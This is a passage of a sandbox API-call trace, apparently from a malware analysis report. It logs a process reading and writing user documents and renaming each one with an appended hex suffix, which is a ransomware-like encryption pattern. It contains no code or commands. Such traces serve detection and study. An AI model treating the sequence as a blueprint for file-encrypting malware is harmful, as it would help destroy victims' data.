CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.564] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.566] RtlInterlockedCompareExchange64 () returned 0x0 [0166.566] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.578] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.579] RtlInterlockedCompareExchange64 () returned 0x0 [0166.579] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.597] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.598] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt", lpString2=".BAE072F60EDC072BBBD00766EB96DC253F4C7B8EB4E5E5763E139AF3712BE914" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt.BAE072F60EDC072BBBD00766EB96DC253F4C7B8EB4E5E5763E139AF3712BE914") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\4b-1nutJ1.odt.BAE072F60EDC072BBBD00766EB96DC253F4C7B8EB4E5E5763E139AF3712BE914" [0166.598] GetProcessHeap () returned 0x270000 [0166.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741d2e0 [0166.599] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x741d2e0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.602] CloseHandle (hObject=0x5b0) returned 1 [0166.604] GetProcessHeap () returned 0x270000 [0166.605] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.605] RtlInterlockedCompareExchange64 () returned 0x1 [0166.605] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.610] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.611] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.613] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.614] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf", lpString2=".AF0BC88923FFC3CAB6E4AAD17DF1230F77AE9D08FE0E03A99198402F87D40661" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf.AF0BC88923FFC3CAB6E4AAD17DF1230F77AE9D08FE0E03A99198402F87D40661") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\8X9WjuuzW6SgBw9jG.pdf.AF0BC88923FFC3CAB6E4AAD17DF1230F77AE9D08FE0E03A99198402F87D40661" [0166.614] GetProcessHeap () returned 0x270000 [0166.614] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13a) returned 0x76b8160 [0166.614] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8160, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0166.616] CloseHandle (hObject=0x5b0) returned 1 [0166.617] GetProcessHeap () returned 0x270000 [0166.618] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.618] RtlInterlockedCompareExchange64 () returned 0x1 [0166.618] GetQueuedCompletionStatus (in: 
CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.623] ReadFile (in: hFile=0x5b0, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x4200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.623] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.625] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.627] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf", lpString2=".AD0382A6191959AA97447D1351E5E1ABBB9D8F45453C848943303C744582A918" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf.AD0382A6191959AA97447D1351E5E1ABBB9D8F45453C848943303C744582A918") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf.AD0382A6191959AA97447D1351E5E1ABBB9D8F45453C848943303C744582A918" [0166.627] GetProcessHeap () returned 0x270000 [0166.627] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x76b82a8 [0166.627] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x76b82a8, Length=0x140, FileInformationClass=0xa) returned 0x0 [0166.629] CloseHandle (hObject=0x5b0) returned 1 [0166.631] GetProcessHeap () returned 0x270000 [0166.633] HeapFree (in: hHeap=0x270000, dwFlags=0x0, 
lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.633] RtlInterlockedCompareExchange64 () returned 0x1 [0166.633] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.638] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.639] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.641] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.642] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf", lpString2=".493448B6A28B0A45E9A19E03AEACB0B36EB913CB5DA0C955784A2F1EDD8F9B7D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf.493448B6A28B0A45E9A19E03AEACB0B36EB913CB5DA0C955784A2F1EDD8F9B7D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf.493448B6A28B0A45E9A19E03AEACB0B36EB913CB5DA0C955784A2F1EDD8F9B7D" [0166.642] GetProcessHeap () returned 0x270000 [0166.642] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x148) returned 0x4257800 [0166.642] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x4257800, Length=0x148, FileInformationClass=0xa) returned 
0x0 [0166.644] CloseHandle (hObject=0x598) returned 1 [0166.645] GetProcessHeap () returned 0x270000 [0166.647] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.647] RtlInterlockedCompareExchange64 () returned 0x1 [0166.647] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.651] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.652] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.654] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.655] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf", lpString2=".CB843A2299682EB75A6D8BB57EB1A517AEFE195DA8FCC4F14561694115C56B50" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf.CB843A2299682EB75A6D8BB57EB1A517AEFE195DA8FCC4F14561694115C56B50") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf.CB843A2299682EB75A6D8BB57EB1A517AEFE195DA8FCC4F14561694115C56B50" [0166.655] GetProcessHeap () returned 0x270000 [0166.655] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) 
returned 0x76b83f0 [0166.656] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b83f0, Length=0x150, FileInformationClass=0xa) returned 0x0 [0166.657] CloseHandle (hObject=0x598) returned 1 [0166.658] GetProcessHeap () returned 0x270000 [0166.660] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.660] RtlInterlockedCompareExchange64 () returned 0x1 [0166.660] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.664] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.667] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.669] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.670] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps", lpString2=".014EF268F10038221DBC25D89D66C66C307FD40CBCCA8D150D254B8C37274F72" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps.014EF268F10038221DBC25D89D66C66C307FD40CBCCA8D150D254B8C37274F72") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f 
JTmrxPq5\\o5nATWfNm.pps.014EF268F10038221DBC25D89D66C66C307FD40CBCCA8D150D254B8C37274F72" [0166.670] GetProcessHeap () returned 0x270000 [0166.670] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x76b8548 [0166.670] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8548, Length=0x140, FileInformationClass=0xa) returned 0x0 [0166.673] CloseHandle (hObject=0x598) returned 1 [0166.673] GetProcessHeap () returned 0x270000 [0166.675] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.675] RtlInterlockedCompareExchange64 () returned 0x1 [0166.676] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.679] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x5600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.679] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.681] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.682] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp", lpString2=".81C1BFD2A163A2FCB88AB689B2761894E84597237411EF512145F3AE23223344" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f 
JTmrxPq5\\XfvX6mEZdudE-A vLi.odp.81C1BFD2A163A2FCB88AB689B2761894E84597237411EF512145F3AE23223344") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp.81C1BFD2A163A2FCB88AB689B2761894E84597237411EF512145F3AE23223344" [0166.682] GetProcessHeap () returned 0x270000 [0166.682] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35b740 [0166.682] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x35b740, Length=0x152, FileInformationClass=0xa) returned 0x0 [0166.684] CloseHandle (hObject=0x598) returned 1 [0166.685] GetProcessHeap () returned 0x270000 [0166.688] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.688] RtlInterlockedCompareExchange64 () returned 0x1 [0166.688] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.700] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.700] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.703] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.704] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx", 
lpString2=".2A5496E20D96D4D021BF330AD735FFA146C21A6D0212E0BFAB268CEA8D88890E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx.2A5496E20D96D4D021BF330AD735FFA146C21A6D0212E0BFAB268CEA8D88890E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\bAUW4.pptx.2A5496E20D96D4D021BF330AD735FFA146C21A6D0212E0BFAB268CEA8D88890E" [0166.704] GetProcessHeap () returned 0x270000 [0166.704] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x4257958 [0166.705] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x4257958, Length=0x146, FileInformationClass=0xa) returned 0x0 [0166.707] CloseHandle (hObject=0x598) returned 1 [0166.708] GetProcessHeap () returned 0x270000 [0166.709] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.709] RtlInterlockedCompareExchange64 () returned 0x1 [0166.709] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.714] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.714] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.717] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, 
ReturnLength=0x6fef7f4) returned 0x0 [0166.719] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls", lpString2=".16E656A9826E14763C82A07AFE54A9408EE01888706B8E48784AD3163B583266" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls.16E656A9826E14763C82A07AFE54A9408EE01888706B8E48784AD3163B583266") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\DI5i-e 02AN.xls.16E656A9826E14763C82A07AFE54A9408EE01888706B8E48784AD3163B583266" [0166.719] GetProcessHeap () returned 0x270000 [0166.719] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x76b8998 [0166.719] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x76b8998, Length=0x150, FileInformationClass=0xa) returned 0x0 [0166.720] CloseHandle (hObject=0x598) returned 1 [0166.722] GetProcessHeap () returned 0x270000 [0166.723] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.723] RtlInterlockedCompareExchange64 () returned 0x1 [0166.723] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.728] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.732] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.734] NtQueryObject 
(in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.735] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf", lpString2=".7A360C43AEDD756D2D2D3ACE343BE926B99E68A966CE31FF78F2346DD5A72573" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf.7A360C43AEDD756D2D2D3ACE343BE926B99E68A966CE31FF78F2346DD5A72573") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\IE5ugm.pdf.7A360C43AEDD756D2D2D3ACE343BE926B99E68A966CE31FF78F2346DD5A72573" [0166.735] GetProcessHeap () returned 0x270000 [0166.735] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x4257ab0 [0166.735] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x4257ab0, Length=0x146, FileInformationClass=0xa) returned 0x0 [0166.738] CloseHandle (hObject=0x598) returned 1 [0166.738] GetProcessHeap () returned 0x270000 [0166.740] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.740] RtlInterlockedCompareExchange64 () returned 0x1 [0166.740] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.746] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.746] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.748] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76900b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.750] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps", lpString2=".D3A7189E2C47A0C8A410554DA9F0431AB4A66827FD6584A84AEF070492039041" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps.D3A7189E2C47A0C8A410554DA9F0431AB4A66827FD6584A84AEF070492039041") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\FIMjs52RRmmi4D7W\\Jj5fVb4IcQEw.pps.D3A7189E2C47A0C8A410554DA9F0431AB4A66827FD6584A84AEF070492039041" [0166.750] GetProcessHeap () returned 0x270000 [0166.750] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35b8a8 [0166.750] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x6fef7e4, FileInformation=0x35b8a8, Length=0x152, FileInformationClass=0xa) returned 0x0 [0166.751] CloseHandle (hObject=0x598) returned 1 [0166.752] GetProcessHeap () returned 0x270000 [0166.755] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.755] RtlInterlockedCompareExchange64 () returned 0x1 [0166.755] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.758] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, 